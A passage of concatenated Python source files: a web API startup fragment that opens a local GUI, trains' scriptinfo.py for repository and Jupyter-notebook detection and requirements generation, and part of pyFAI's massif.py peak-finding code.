api.representations['application/json'] = custom_output_json
port = config['api']['http']['port']
host = config['api']['http']['host']
# NOTE rewrite it, that hotfix to see GUI link
if not no_studio:
log = get_log('http')
if host in ('', '0.0.0.0'):
url = f'http://127.0.0.1:{port}/'
else:
url = f'http://{host}:{port}/'
log.info(f' - GUI available at {url}')
pid = os.getpid()
x = threading.Thread(target=_open_webbrowser, args=(url, pid, port, init_static_thread, config['paths']['static']), daemon=True)
x.start()
return app, api
def initialize_interfaces(app):
app.original_data_store = DataStore()
app.original_model_interface = ModelInterface()
app.original_datasource_interface = DatasourceController()
config = Config()
app.config_obj = config
def _open_webbrowser(url: str, pid: int, port: int, init_static_thread, static_folder):
"""Open webbrowser with url when http service is started.
If some error then do nothing.
"""
init_static_thread.join()
inject_telemetry_to_static(static_folder)
logger = get_log('http')
try:
is_http_active = wait_func_is_true(func=is_pid_listen_port, timeout=10,
pid=pid, port=port)
if is_http_active:
webbrowser.open(url)
except Exception as e:
logger.error(f'Failed to open {url} in webbrowser with exception {e}')
logger.error(traceback.format_exc())
session.close()
|
scriptinfo.py
|
import os
import sys
from copy import copy
from functools import partial
from tempfile import mkstemp
import attr
import logging
import json
from furl import furl
from pathlib2 import Path
from threading import Thread, Event
from .util import get_command_output
from ....backend_api import Session
from ....debugging import get_logger
from .detectors import GitEnvDetector, GitDetector, HgEnvDetector, HgDetector, Result as DetectionResult
_logger = get_logger("Repository Detection")
class ScriptInfoError(Exception):
pass
class ScriptRequirements(object):
_max_requirements_size = 512 * 1024
def __init__(self, root_folder):
self._root_folder = root_folder
def get_requirements(self, entry_point_filename=None):
# noinspection PyBroadException
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail
from ....utilities.pigar.__main__ import GenerateReqs
installed_pkgs = get_installed_pkgs_detail()
gr = GenerateReqs(save_path='', project_path=self._root_folder, installed_pkgs=installed_pkgs,
ignores=['.git', '.hg', '.idea', '__pycache__', '.ipynb_checkpoints',
'site-packages', 'dist-packages'])
reqs, try_imports, guess, local_pks = gr.extract_reqs(
module_callback=ScriptRequirements.add_trains_used_packages, entry_point_filename=entry_point_filename)
return self.create_requirements_txt(reqs, local_pks)
except Exception:
return '', ''
@staticmethod
def add_trains_used_packages(modules):
# hack: forcefully insert storage modules if we have them
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
import boto3
modules.add('boto3', 'trains.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
from google.cloud import storage
modules.add('google_cloud_storage', 'trains.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
from azure.storage.blob import ContentSettings
modules.add('azure_storage_blob', 'trains.storage', 0)
except Exception:
pass
# bugfix, replace sklearn with scikit-learn name
if 'sklearn' in modules:
sklearn = modules.pop('sklearn', {})
for fname, lines in sklearn.items():
modules.add('scikit_learn', fname, lines)
# if we have torch and it supports tensorboard, we should add that as well
# (because it will not be detected automatically)
if 'torch' in modules and 'tensorboard' not in modules:
# noinspection PyBroadException
try:
# see if this version of torch support tensorboard
# noinspection PyPackageRequirements,PyUnresolvedReferences
import torch.utils.tensorboard
# noinspection PyPackageRequirements,PyUnresolvedReferences
import tensorboard
modules.add('tensorboard', 'torch', 0)
except Exception:
pass
# remove setuptools, we should not specify this module version. It is installed by default
if 'setuptools' in modules:
modules.pop('setuptools', {})
# add forced requirements:
# noinspection PyBroadException
try:
from ..task import Task
# noinspection PyProtectedMember
for package, version in Task._force_requirements.items():
modules.add(package, 'trains', 0)
except Exception:
pass
return modules
@staticmethod
def create_requirements_txt(reqs, local_pks=None):
# write requirements.txt
# noinspection PyBroadException
try:
conda_requirements = ''
conda_prefix = os.environ.get('CONDA_PREFIX')
if conda_prefix and not conda_prefix.endswith(os.path.sep):
conda_prefix += os.path.sep
if conda_prefix and sys.executable.startswith(conda_prefix):
conda_packages_json = get_command_output(['conda', 'list', '--json'])
conda_packages_json = json.loads(conda_packages_json)
reqs_lower = {k.lower(): (k, v) for k, v in reqs.items()}
for r in conda_packages_json:
# check if this is a pypi package, if it is, leave it outside
if not r.get('channel') or r.get('channel') == 'pypi':
continue
# check if we have it in our required packages
name = r['name'].lower().replace('-', '_')
# hack support pytorch/torch different naming convention
if name == 'pytorch':
name = 'torch'
k, v = reqs_lower.get(name, (None, None))
if k and v is not None:
conda_requirements += '{0} {1} {2}\n'.format(k, '==', v.version)
except Exception:
conda_requirements = ''
# add forced requirements:
# noinspection PyBroadException
try:
from ..task import Task
# noinspection PyProtectedMember
forced_packages = copy(Task._force_requirements)
except Exception:
forced_packages = {}
# python version header
requirements_txt = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n'
if local_pks:
requirements_txt += '\n# Local modules found - skipping:\n'
for k, v in local_pks.sorted_items():
requirements_txt += '# {0} == {1}\n'.format(k, v.version)
# requirement summary
requirements_txt += '\n'
for k, v in reqs.sorted_items():
version = v.version
if k in forced_packages:
forced_version = forced_packages.pop(k, None)
if forced_version:
version = forced_version
# requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
if k == '-e':
requirements_txt += '{0} {1}\n'.format(k, version)
elif v:
requirements_txt += '{0} {1} {2}\n'.format(k, '==', version)
else:
requirements_txt += '{0}\n'.format(k)
# add forced requirements that we could not find installed on the system
for k in sorted(forced_packages.keys()):
if forced_packages[k]:
requirements_txt += '{0} {1} {2}\n'.format(k, '==', forced_packages[k])
else:
requirements_txt += '{0}\n'.format(k)
requirements_txt_packages_only = \
requirements_txt + '\n# Skipping detailed import analysis, it is too large\n'
# requirements details (in comments)
requirements_txt += '\n' + \
'# Detailed import analysis\n' \
'# **************************\n'
if local_pks:
for k, v in local_pks.sorted_items():
requirements_txt += '\n'
requirements_txt += '# IMPORT LOCAL PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
for k, v in reqs.sorted_items():
requirements_txt += '\n'
if k == '-e':
requirements_txt += '# IMPORT PACKAGE {0} {1}\n'.format(k, v.version)
else:
requirements_txt += '# IMPORT PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
# make sure we do not exceed the size a size limit
return (requirements_txt if len(requirements_txt) < ScriptRequirements._max_requirements_size
else requirements_txt_packages_only,
conda_requirements)
class _JupyterObserver(object):
_thread = None
_exit_event = Event()
_sync_event = Event()
_sample_frequency = 30.
_first_sample_frequency = 3.
_jupyter_history_logger = None
@classmethod
def observer(cls, jupyter_notebook_filename, log_history):
if cls._thread is not None:
# order of signaling is important!
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
if log_history and cls._jupyter_history_logger is None:
cls._jupyter_history_logger = _JupyterHistoryLogger()
cls._jupyter_history_logger.hook()
cls._sync_event.clear()
cls._exit_event.clear()
cls._thread = Thread(target=cls._daemon, args=(jupyter_notebook_filename, ))
cls._thread.daemon = True
cls._thread.start()
@classmethod
def signal_sync(cls, *_, **__):
cls._sync_event.set()
@classmethod
def close(cls):
if not cls._thread:
return
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
cls._thread = None
@classmethod
def _daemon(cls, jupyter_notebook_filename):
from trains import Task
# load jupyter notebook package
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from nbconvert.exporters.script import ScriptExporter
_script_exporter = ScriptExporter()
except Exception:
return
# load pigar
# noinspection PyBroadException
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail, file_import_modules
from ....utilities.pigar.modules import ReqsModules
from ....utilities.pigar.log import logger
logger.setLevel(logging.WARNING)
except Exception:
file_import_modules = None
# load IPython
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
except Exception:
# should not happen
get_ipython = None
# setup local notebook files
if jupyter_notebook_filename:
notebook = Path(jupyter_notebook_filename)
local_jupyter_filename = jupyter_notebook_filename
else:
notebook = None
fd, local_jupyter_filename = mkstemp(suffix='.ipynb')
os.close(fd)
last_update_ts = None
counter = 0
prev_script_hash = None
# noinspection PyBroadException
try:
from ....version import __version__
our_module = cls.__module__.split('.')[0], __version__
except Exception:
our_module = None
# noinspection PyBroadException
try:
import re
replace_ipython_pattern = re.compile(r'\n([ \t]*)get_ipython\(\)')
except Exception:
replace_ipython_pattern = None
# main observer loop, check if we need to exit
while not cls._exit_event.wait(timeout=0.):
# wait for timeout or sync event
cls._sync_event.wait(cls._sample_frequency if counter else cls._first_sample_frequency)
cls._sync_event.clear()
counter += 1
# noinspection PyBroadException
try:
# if there is no task connected, do nothing
task = Task.current_task()
if not task:
continue
script_code = None
fmodules = None
current_cell = None
# if we have a local file:
if notebook:
if not notebook.exists():
continue
# check if notebook changed
if last_update_ts is not None and notebook.stat().st_mtime - last_update_ts <= 0:
continue
last_update_ts = notebook.stat().st_mtime
else:
# serialize notebook to a temp file
if cls._jupyter_history_logger:
script_code, current_cell = cls._jupyter_history_logger.history_to_str()
else:
# noinspection PyBroadException
try:
# noinspection PyBroadException
try:
os.unlink(local_jupyter_filename)
except Exception:
pass
get_ipython().run_line_magic('history', '-t -f {}'.format(local_jupyter_filename))
with open(local_jupyter_filename, 'r') as f:
script_code = f.read()
# load the modules
from ....utilities.pigar.modules import ImportedModules
fmodules = ImportedModules()
for nm in set([str(m).split('.')[0] for m in sys.modules]):
fmodules.add(nm, 'notebook', 0)
except Exception:
continue
# get notebook python script
if script_code is None:
script_code, _ = _script_exporter.from_filename(local_jupyter_filename)
current_script_hash = hash(script_code + (current_cell or ''))
if prev_script_hash and prev_script_hash == current_script_hash:
continue
# remove ipython direct access from the script code
# we will not be able to run them anyhow
if replace_ipython_pattern:
script_code = replace_ipython_pattern.sub(r'\n# \g<1>get_ipython()', script_code)
requirements_txt = ''
conda_requirements = ''
# parse jupyter python script and prepare pip requirements (pigar)
# if backend supports requirements
if file_import_modules and Session.check_min_api_version('2.2'):
if fmodules is None:
fmodules, _ = file_import_modules(
notebook.parts[-1] if notebook else 'notebook', script_code)
if current_cell:
cell_fmodules, _ = file_import_modules(
notebook.parts[-1] if notebook else 'notebook', current_cell)
# noinspection PyBroadException
try:
fmodules |= cell_fmodules
except Exception:
pass
# add current cell to the script
if current_cell:
script_code += '\n' + current_cell
fmodules = ScriptRequirements.add_trains_used_packages(fmodules)
# noinspection PyUnboundLocalVariable
installed_pkgs = get_installed_pkgs_detail()
# make sure we are in installed packages
if our_module and (our_module[0] not in installed_pkgs):
installed_pkgs[our_module[0]] = our_module
# noinspection PyUnboundLocalVariable
reqs = ReqsModules()
for name in fmodules:
if name in installed_pkgs:
pkg_name, version = installed_pkgs[name]
reqs.add(pkg_name, version, fmodules[name])
requirements_txt, conda_requirements = ScriptRequirements.create_requirements_txt(reqs)
# update script
prev_script_hash = current_script_hash
data_script = task.data.script
data_script.diff = script_code
data_script.requirements = {'pip': requirements_txt, 'conda': conda_requirements}
# noinspection PyProtectedMember
task._update_script(script=data_script)
# update requirements
# noinspection PyProtectedMember
task._update_requirements(requirements=requirements_txt)
except Exception:
pass
class ScriptInfo(object):
plugins = [GitEnvDetector(), HgEnvDetector(), HgDetector(), GitDetector()]
""" Script info detection plugins, in order of priority """
@classmethod
def _jupyter_install_post_store_hook(cls, jupyter_notebook_filename, log_history=False):
# noinspection PyBroadException
try:
if 'IPython' in sys.modules:
# noinspection PyPackageRequirements
from IPython import get_ipython
if get_ipython():
_JupyterObserver.observer(jupyter_notebook_filename, log_history)
get_ipython().events.register('pre_run_cell', _JupyterObserver.signal_sync)
if log_history:
get_ipython().events.register('post_run_cell', _JupyterObserver.signal_sync)
except Exception:
pass
@classmethod
def _get_jupyter_notebook_filename(cls):
if not (sys.argv[0].endswith(os.path.sep + 'ipykernel_launcher.py') or
sys.argv[0].endswith(os.path.join(os.path.sep, 'ipykernel', '__main__.py'))) \
or len(sys.argv) < 3 or not sys.argv[2].endswith('.json'):
return None
# we can safely assume that we can import the notebook package here
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from notebook.notebookapp import list_running_servers
import requests
current_kernel = sys.argv[2].split(os.path.sep)[-1].replace('kernel-', '').replace('.json', '')
# noinspection PyBroadException
try:
server_info = next(list_running_servers())
except Exception:
# on some jupyter notebook versions this function can crash on parsing the json file,
# we will parse it manually here
# noinspection PyPackageRequirements
import ipykernel
from glob import glob
import json
for f in glob(os.path.join(os.path.dirname(ipykernel.get_connection_file()), 'nbserver-*.json')):
# noinspection PyBroadException
try:
with open(f, 'r') as json_data:
server_info = json.load(json_data)
except Exception:
server_info = None
if server_info:
break
try:
r = requests.get(
url=server_info['url'] + 'api/sessions',
headers={'Authorization': 'token {}'.format(server_info.get('token', '')), })
except requests.exceptions.SSLError:
# disable SSL check warning
from urllib3.exceptions import InsecureRequestWarning
# noinspection PyUnresolvedReferences
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# fire request
r = requests.get(
url=server_info['url'] + 'api/sessions',
headers={'Authorization': 'token {}'.format(server_info.get('token', '')), }, verify=False)
# enable SSL check warning
import warnings
warnings.simplefilter('default', InsecureRequestWarning)
r.raise_for_status()
notebooks = r.json()
cur_notebook = None
for n in notebooks:
if n['kernel']['id'] == current_kernel:
cur_notebook = n
break
notebook_path = cur_notebook['notebook'].get('path', '')
notebook_name = cur_notebook['notebook'].get('name', '')
is_google_colab = False
# check if this is google.colab, then there is no local file
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
if get_ipython() and 'google.colab' in get_ipython().extension_manager.loaded:
is_google_colab = True
except Exception:
pass
if is_google_colab:
script_entry_point = str(notebook_name or 'notebook').replace(
'>', '_').replace('<', '_').replace('.ipynb', '.py')
if not script_entry_point.lower().endswith('.py'):
script_entry_point += '.py'
local_ipynb_file = None
else:
# always slash, because this is from uri (so never backslash not even oon windows)
entry_point_filename = notebook_path.split('/')[-1]
# now we should try to find the actual file
entry_point = (Path.cwd() / entry_point_filename).absolute()
if not entry_point.is_file():
entry_point = (Path.cwd() / notebook_path).absolute()
# get local ipynb for observer
local_ipynb_file = entry_point.as_posix()
# now replace the .ipynb with .py
# we assume we will have that file available with the Jupyter notebook plugin
entry_point = entry_point.with_suffix('.py')
script_entry_point = entry_point.as_posix()
# install the post store hook,
# notice that if we do not have a local file we serialize/write every time the entire notebook
cls._jupyter_install_post_store_hook(local_ipynb_file, is_google_colab)
return script_entry_point
except Exception:
return None
@classmethod
def _get_entry_point(cls, repo_root, script_path):
repo_root = Path(repo_root).absolute()
try:
# Use os.path.relpath as it calculates up dir movements (../)
entry_point = os.path.relpath(str(script_path), str(Path.cwd()))
except ValueError:
# Working directory not under repository root
entry_point = script_path.relative_to(repo_root)
return Path(entry_point).as_posix()
@classmethod
def _get_working_dir(cls, repo_root):
repo_root = Path(repo_root).absolute()
try:
return Path.cwd().relative_to(repo_root).as_posix()
except ValueError:
# Working directory not under repository root
return os.path.curdir
@classmethod
def _get_script_code(cls, script_path):
# noinspection PyBroadException
try:
with open(script_path, 'r') as f:
script_code = f.read()
return script_code
except Exception:
pass
return ''
@classmethod
def _get_script_info(cls, filepaths, check_uncommitted=True, create_requirements=True, log=None):
jupyter_filepath = cls._get_jupyter_notebook_filename()
if jupyter_filepath:
scripts_path = [Path(os.path.normpath(jupyter_filepath)).absolute()]
else:
scripts_path = [Path(os.path.normpath(f)).absolute() for f in filepaths if f]
if all(not f.is_file() for f in scripts_path):
raise ScriptInfoError(
"Script file {} could not be found".format(scripts_path)
)
scripts_dir = [f.parent for f in scripts_path]
def _log(msg, *args, **kwargs):
if not log:
return
log.warning(
"Failed auto-detecting task repository: {}".format(
msg.format(*args, **kwargs)
)
)
plugin = next((p for p in cls.plugins if any(p.exists(d) for d in scripts_dir)), None)
repo_info = DetectionResult()
script_dir = scripts_dir[0]
script_path = scripts_path[0]
if not plugin:
log.info("No repository found, storing script code instead")
else:
try:
for i, d in enumerate(scripts_dir):
repo_info = plugin.get_info(str(d), include_diff=check_uncommitted)
if not repo_info.is_empty():
script_dir = d
script_path = scripts_path[i]
break
except Exception as ex:
_log("no info for {} ({})", scripts_dir, ex)
else:
if repo_info.is_empty():
_log("no info for {}", scripts_dir)
repo_root = repo_info.root or script_dir
if not plugin:
working_dir = '.'
entry_point = str(script_path.name)
else:
working_dir = cls._get_working_dir(repo_root)
entry_point = cls._get_entry_point(repo_root, script_path)
if check_uncommitted:
diff = cls._get_script_code(script_path.as_posix()) \
if not plugin or not repo_info.commit else repo_info.diff
else:
diff = ''
# if this is not jupyter, get the requirements.txt
requirements = ''
conda_requirements = ''
# create requirements if backend supports requirements
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if not jupyter_filepath and Session.check_min_api_version('2.2'):
script_requirements = ScriptRequirements(
Path(repo_root).as_posix() if repo_info.url else script_path.as_posix())
if create_requirements:
requirements, conda_requirements = script_requirements.get_requirements()
else:
script_requirements = None
script_info = dict(
repository=furl(repo_info.url).remove(username=True, password=True).tostr(),
branch=repo_info.branch,
version_num=repo_info.commit,
entry_point=entry_point,
working_dir=working_dir,
diff=diff,
requirements={'pip': requirements, 'conda': conda_requirements} if requirements else None,
binary='python{}.{}'.format(sys.version_info.major, sys.version_info.minor),
repo_root=repo_root,
jupyter_filepath=jupyter_filepath,
)
messages = []
if repo_info.modified:
messages.append(
"======> WARNING! UNCOMMITTED CHANGES IN REPOSITORY {} <======".format(
script_info.get("repository", "")
)
)
if not any(script_info.values()):
script_info = None
return (ScriptInfoResult(script=script_info, warning_messages=messages),
script_requirements)
@classmethod
def get(cls, filepaths=None, check_uncommitted=True, create_requirements=True, log=None):
try:
if not filepaths:
filepaths = [sys.argv[0], ]
return cls._get_script_info(
filepaths=filepaths, check_uncommitted=check_uncommitted,
create_requirements=create_requirements, log=log)
except Exception as ex:
if log:
log.warning("Failed auto-detecting task repository: {}".format(ex))
return ScriptInfoResult(), None
@classmethod
def detect_running_module(cls, script_dict):
# noinspection PyBroadException
try:
# If this is jupyter, do not try to detect the running module, we know what we have.
if script_dict.get('jupyter_filepath'):
return script_dict
if '__main__' in sys.modules and vars(sys.modules['__main__'])['__package__']:
argvs = ''
git_root = os.path.abspath(script_dict['repo_root']) if script_dict['repo_root'] else None
for a in sys.argv[1:]:
if git_root and os.path.exists(a):
# check if common to project:
a_abs = os.path.abspath(a)
if os.path.commonpath([a_abs, git_root]) == git_root:
# adjust path relative to working dir inside git repo
a = ' ' + os.path.relpath(a_abs, os.path.join(git_root, script_dict['working_dir']))
argvs += ' {}'.format(a)
# update the script entry point to match the real argv and module call
script_dict['entry_point'] = '-m {}{}'.format(
vars(sys.modules['__main__'])['__package__'], (' ' + argvs) if argvs else '')
except Exception:
pass
return script_dict
@classmethod
def close(cls):
_JupyterObserver.close()
@attr.s
class ScriptInfoResult(object):
script = attr.ib(default=None)
warning_messages = attr.ib(factory=list)
class _JupyterHistoryLogger(object):
_reg_replace_ipython = r'\n([ \t]*)get_ipython\(\)'
_reg_replace_magic = r'\n([ \t]*)%'
_reg_replace_bang = r'\n([ \t]*)!'
def __init__(self):
self._exception_raised = False
self._cells_code = {}
self._counter = 0
self._ip = None
self._current_cell = None
# noinspection PyBroadException
try:
import re
self._replace_ipython_pattern = re.compile(self._reg_replace_ipython)
self._replace_magic_pattern = re.compile(self._reg_replace_magic)
self._replace_bang_pattern = re.compile(self._reg_replace_bang)
except Exception:
self._replace_ipython_pattern = None
self._replace_magic_pattern = None
self._replace_bang_pattern = None
def hook(self, ip=None):
if not ip:
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
except Exception:
return
self._ip = get_ipython()
else:
self._ip = ip
# noinspection PyBroadException
try:
# if this is colab, the callbacks do not contain the raw_cell content, so we have to patch it
if 'google.colab' in self._ip.extension_manager.loaded:
self._ip._org_run_cell = self._ip.run_cell
self._ip.run_cell = partial(self._patched_run_cell, self._ip)
except Exception as ex:
pass
# start with the current history
self._initialize_history()
self._ip.events.register('post_run_cell', self._post_cell_callback)
self._ip.events.register('pre_run_cell', self._pre_cell_callback)
self._ip.set_custom_exc((Exception,), self._exception_callback)
def _patched_run_cell(self, shell, *args, **kwargs):
# noinspection PyBroadException
try:
raw_cell = kwargs.get('raw_cell') or args[0]
self._current_cell = raw_cell
except Exception:
pass
# noinspection PyProtectedMember
return shell._org_run_cell(*args, **kwargs)
def history(self, filename):
with open(filename, 'wt') as f:
for k, v in sorted(self._cells_code.items(), key=lambda p: p[0]):
f.write(v)
def history_to_str(self):
# return a pair: (history as str, current cell if we are in still in cell execution otherwise None)
return '\n'.join(v for k, v in sorted(self._cells_code.items(), key=lambda p: p[0])), self._current_cell
# noinspection PyUnusedLocal
def _exception_callback(self, shell, etype, value, tb, tb_offset=None):
self._exception_raised = True
return shell.showtraceback()
def _pre_cell_callback(self, *args, **_):
# noinspection PyBroadException
try:
if args:
self._current_cell = args[0].raw_cell
# we might have this value from somewhere else
if self._current_cell:
self._current_cell = self._conform_code(self._current_cell, replace_magic_bang=True)
except Exception:
pass
def _post_cell_callback(self, *_, **__):
# noinspection PyBroadException
try:
self._current_cell = None
if self._exception_raised:
# do nothing
self._exception_raised = False
return
self._exception_raised = False
# add the cell history
# noinspection PyBroadException
try:
cell_code = '\n' + self._ip.history_manager.input_hist_parsed[-1]
except Exception:
return
# fix magic / bang in code
cell_code = self._conform_code(cell_code)
self._cells_code[self._counter] = cell_code
self._counter += 1
except Exception:
pass
def _initialize_history(self):
# only once
if -1 in self._cells_code:
return
# noinspection PyBroadException
try:
cell_code = '\n' + '\n'.join(self._ip.history_manager.input_hist_parsed[:-1])
except Exception:
return
cell_code = self._conform_code(cell_code)
self._cells_code[-1] = cell_code
def _conform_code(self, cell_code, replace_magic_bang=False):
# fix magic / bang in code
if self._replace_ipython_pattern:
cell_code = self._replace_ipython_pattern.sub(r'\n# \g<1>get_ipython()', cell_code)
if replace_magic_bang and self._replace_magic_pattern and self._replace_bang_pattern:
cell_code = self._replace_magic_pattern.sub(r'\n# \g<1>%', cell_code)
cell_code = self._replace_bang_pattern.sub(r'\n# \g<1>!', cell_code)
return cell_code
|
massif.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Project: Azimuthal integration
# https://github.com/silx-kit/pyFAI
#
# Copyright (C) 2014-2018 European Synchrotron Radiation Facility, Grenoble, France
#
# Principal author: Jérôme Kieffer (Jerome.Kieffer@ESRF.eu)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
__author__ = "Jérôme Kieffer"
__contact__ = "Jerome.Kieffer@ESRF.eu"
__license__ = "MIT"
__copyright__ = "European Synchrotron Radiation Facility, Grenoble, France"
__date__ = "22/03/2019"
__status__ = "production"
import sys
import os
import threading
from math import ceil, sqrt
import logging
logger = logging.getLogger(__name__)
import numpy
import fabio
from scipy.ndimage import label, distance_transform_edt
from scipy.ndimage.filters import median_filter
from .utils.decorators import deprecated
from .ext.bilinear import Bilinear
from .utils import gaussian_filter, binning, unbinning, is_far_from_group
from .third_party import six
if os.name != "nt":
WindowsError = RuntimeError
class Massif(object):
"""
A massif is defined as an area around a peak, it is used to find neighboring peaks
"""
TARGET_SIZE = 1024
def __init__(self, data=None, mask=None):
"""Constructor of the class...
:param data: 2D array or filename (discouraged)
:param mask: array with non zero for invalid data
"""
if isinstance(data, six.string_types) and os.path.isfile(data):
self.data = fabio.open(data).data.astype("float32")
elif isinstance(data, fabio.fabioimage.fabioimage):
self.data = data.data.astype("float32")
else:
try:
self.data = data.astype("float32")
except Exception as error:
logger.error("Unable to understand this type of data %s: %s", data, error)
self.log_info = True
"""If true, more information is displayed in the logger relative to picking."""
self.mask = mask
self._cleaned_data = None
self._bilin = Bilinear(self.data)
self._blurred_data = None
self._median_data = None
self._labeled_massif = None
self._number_massif = None
self._valley_size = None
self._binned_data = None
self._reconstruct_used = None
self.binning = None # Binning is 2-list usually
self._sem = threading.Semaphore()
self._sem_label = threading.Semaphore()
self._sem_binning = threading.Semaphore()
self._sem_median = threading.Semaphore()
def nearest_peak(self, x):
"""
:param x: coordinates of the peak
:returns: the coordinates of the nearest peak
"""
out = self._bilin.local_maxi(x)
if isinstance(out, tuple):
res = out
elif isinstance(out, numpy.ndarray):
res = tuple(out)
else:
res = [int(i) for idx, i in enumerate(out) if 0 <= i < self.data.shape[idx]]
if (len(res) != 2) or not((0 <= out[0] < self.data.shape[0]) and (0 <= res[1] < self.data.shape[1])):
logger.warning("in nearest_peak %s -> %s", x, out)
return
elif (self.mask is not None) and self.mask[int(res[0]), int(res[1])]:
logger.info("Masked pixel %s -> %s", x, out)
return
else:
return res
def calculate_massif(self, x):
"""
defines a map of the massif around x and returns the mask
"""
labeled = self.get_labeled_massif()
if labeled[x[0], x[1]] > 0: # without relabeled the background is 0 labeled.max():
return (labeled == labeled[x[0], x[1]])
def find_peaks(self, x, nmax=200, annotate=None, massif_contour=None, stdout=sys.stdout):
"""
All in one function that finds a maximum from the given seed (x)
then calculates the region extension and extract position of the neighboring peaks.
:param Tuple[int] x: coordinates of the peak, seed for the calculation
:param int nmax: maximum number of peak per region
:param annotate: callback method taking number of points + coordinate as input.
:param massif_contour: callback to show the contour of a massif with the given index.
:param stdout: this is the file where output is written by default.
:return: list of peaks
"""
region = self.calculate_massif(x)
if region is None:
if self.log_info:
logger.error("You picked a background point at %s", x)
return []
xinit = self.nearest_peak(x)
if xinit is None:
if self.log_info:
logger.error("Unable to find peak in the vinicy of %s", x)
return []
else:
if not region[int(xinit[0] + 0.5), int(xinit[1] + 0.5)]:
logger.error("Nearest peak %s is not in the same region %s", xinit, x)
return []
if annotate is not None:
try:
annotate(xinit, x)
except Exception as error:
logger.debug("Backtrace", exc_info=True)
logger.error("Error in annotate %i: %i %i. %s", 0, xinit[0], xinit[1], error)
listpeaks = []
listpeaks.append(xinit)
cleaned_data = self.cleaned_data
mean = cleaned_data[region].mean(dtype=numpy.float64)
region2 = region * (cleaned_data > mean)
idx = numpy.vstack(numpy.where(region2)).T
numpy.random.shuffle(idx)
nmax = min(nmax, int(ceil(sqrt(idx.shape[0]))))
if massif_contour is not None:
try:
massif_contour(region)
except (WindowsError, MemoryError) as error:
logger.debug("Backtrace", exc_info=True)
logger.error("Error in plotting region: %s", error)
nbFailure = 0
for j in idx:
xopt = self.nearest_peak(j)
if xopt is None:
nbFailure += 1
continue
if (region2[int(xopt[0] + 0.5), int(xopt[1] + 0.5)]) and not (xopt in listpeaks):
if stdout:
stdout.write("[ %4i, %4i ] --> [ %5.1f, %5.1f ] after %3i iterations %s" % (tuple(j) + tuple(xopt) + (nbFailure, os.linesep)))
listpeaks.append(xopt)
nbFailure = 0
else:
nbFailure += 1
if (len(listpeaks) > nmax) or (nbFailure > 2 * nmax):
break
return listpeaks
def peaks_from_area(self, mask, Imin=numpy.finfo(numpy.float64).min,
keep=1000, dmin=0.0, seed=None, **kwarg):
"""
Return the list of peaks within an area
:param mask: 2d array with mask.
:param Imin: minimum of intensity above the background to keep the point
:param keep: maximum number of points to keep
:param kwarg: ignored parameters
:param dmin: minimum distance to another peak
:param seed: list of good guesses to start with
:return: list of peaks [y,x], [y,x], ...]
"""
all_points = numpy.vstack(numpy.where(mask)).T
res = []
cnt = 0
dmin2 = dmin * dmin
if len(all_points) > 0:
numpy.random.shuffle(all_points)
if seed:
seeds = numpy.array(list(seed))
if len(seeds) > 0:
numpy.random.shuffle(seeds)
all_points = numpy.concatenate((seeds, all_points))
for idx in all_points:
out = self.nearest_peak(idx)
if out is not None:
msg = "[ %3i, %3i ] -> [ %.1f, %.1f ]"
logger.debug(msg, idx[1], idx[0], out[1], out[0])
p0, p1 = int(round(out[0])), int(round(out[1]))
if mask[p0, p1]:
if (self.data[p0, p1] > Imin) and is_far_from_group(out, res, dmin2):
res.append(out)
cnt = 0
if len(res) >= keep or cnt > keep:
break
else:
cnt += 1
return res
def init_valley_size(self):
if self._valley_size is None:
self.valley_size = max(5., max(self.data.shape) / 50.)
@property
def valley_size(self):
"Defines the minimum distance between two massifs"
if self._valley_size is None:
self.init_valley_size()
return self._valley_size
@valley_size.setter
def valley_size(self, size):
new_size = float(size)
if self._valley_size != new_size:
self._valley_size = new_size
t = threading.Thread(target=self.get_labeled_massif)
t.start()
@valley_size.deleter
def valley_size(self):
self._valley_size = None
self._blurred_data = None
@property
def cleaned_data(self):
if self.mask is None:
return self.data
else:
if self._cleaned_data is None:
idx = distance_transform_edt(self.mask,
return_distances=False,
return_indices=True)
self._cleaned_data = self.data[tuple(idx)]
return self._cleaned_data
def get_binned_data(self):
"""
:return: binned data
"""
if self._binned_data is None:
with self._sem_binning:
if self._binned_data is None:
logger.info("Image size is %s", self.data.shape)
self.binning = []
for i in self.data.shape:
if i % self.TARGET_SIZE == 0:
